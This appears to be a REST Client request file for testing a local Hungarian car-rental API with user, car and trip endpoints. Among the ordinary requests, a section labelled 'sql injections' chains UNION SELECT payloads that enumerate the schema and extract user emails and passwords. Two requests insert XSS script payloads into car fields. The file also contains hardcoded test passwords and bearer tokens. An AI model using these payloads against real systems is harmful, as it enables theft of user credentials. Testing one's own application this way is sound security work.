### login
post http://localhost:4000/login
Content-Type: application/json

{
    "userName": "jozsika",
    "password": "test123"
}


### logout
delete http://localhost:4000/logout
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiam96c2lrYSIsImlhdCI6MTY3NjIzMTgwN30.7HzUxCNDqfCE4l8i99cF3zseU3U7mSO8VixFJesq8Pg

### Userek
get http://localhost:3000/users
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiam96c2lrYSIsImlhdCI6MTY3NjIzMTgwNywiZXhwIjoxNjc2MjMyNzA3fQ.pmbnM9ujP5IT54Ap6xF2Mna-Uk73eLcPkFpzNw-6G-w

### Egy user
get http://localhost:3000/users/2
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyZXN1bHQiOnsiaWQiOjEsImZpcnN0TmFtZSI6IkLDqWxhIiwibGFzdE5hbWUiOiJOYWd5b24iLCJnZW5kZXIiOiJmw6lyZmkiLCJlbWFpbCI6Im5hZ3kuYmVsYUBnbWFpbC5jb20iLCJudW1iZXIiOjM0MzQzNTUzNH0sImlhdCI6MTY0NDMxNTE5NCwiZXhwIjoxNjQ0MzE4Nzk0fQ.q2ih8UiVs51Pa3UEc908O6tLt5Upl9NOlidEmQSksMQ

### User hozzáadása
post http://localhost:3000/users
Content-Type: application/json

{
    "firstName": "Géza",
    "lastName": "Fehér",
    "gender": "férfi",
    "userName": "geza",
    "email": "feher.geza@gmail.com",
    "password": "jozsi123",
    "number": 33333333
}

### User módosítása
put http://localhost:3000/users/3
Content-Type: application/json

{
    "firstName": "Áron",
    "lastName": "Balog",
    "gender": "férfi",
    "userName": "aron",
    "email": "balog.aron@gmail.com",
    "password": "test123",
    "number": 123456
}

### Delete user
delete http://localhost:3000/users/10
### #endregion users

### ---------------------------------------
### get cars
get http://localhost:3000/cars

### get car by id
get http://localhost:3000/cars/2

### sql injections
### get adabázis
get http://localhost:3000/cars/1  UNION SELECT database(), '', '', ''

### get táblák nevei
get http://localhost:3000/cars/1  union select table_name, '','', '' from information_schema.tables where table_schema='cars'

### users tábla oszlopai
get http://localhost:3000/cars/1 union select column_name, '', '', data_type from information_schema.columns where table_name='users' and table_schema='cars'


### get user adatok
get http://localhost:3000/cars/1 union select email, password, '','' from users

### delte car by id
delete http://localhost:3000/cars/2

### post car
post http://localhost:3000/cars
Content-Type: application/json

{
    "name": "Mercedes",
    "licenceNumber": "MM-111",
    "hourlyRate": 2500
}

### post car XSS teszt
post http://localhost:3000/cars
Content-Type: application/json

{
    "name": "X Mercedes <script>alert('betörtem')</script>",
    "licenceNumber": "MM-111 <script>alert('betörtem')</script>",
    "hourlyRate": "2500  <script>alert('betörtem')</script>"
}

### put car by id
put http://localhost:3000/cars/604
Content-Type: application/json

{
    "name": "Mercedes3",
    "licenceNumber": "MM-222",
    "hourlyRate": 2600
}

### put car by id XSS teszt
put http://localhost:3000/cars/11
Content-Type: application/json

{
    "name": "XY Mercedes <script>alert('betörtem')</script>",
    "licenceNumber": "YM-111 <script>alert('betörtem')</script>",
    "hourlyRate": "2600  <script>alert('betörtem')</script>"
}

### get trips by carId
get http://localhost:3000/tripsByCarId/1

### get trips by id
get http://localhost:3000/trips/2984

### get trips
get http://localhost:3000/trips

### post trip
post http://localhost:3000/trips
Content-Type: application/json

{
    "numberOfMinits": 56,
    "date": "2022.10.13 01:36:00",
    "carId": 3
}


### put trip by id
put http://localhost:3000/trips/2984
Content-Type: application/json

{
    "numberOfMinits": 55,
    "date": "2022.10.13 01:35:00",
    "carId": 2
}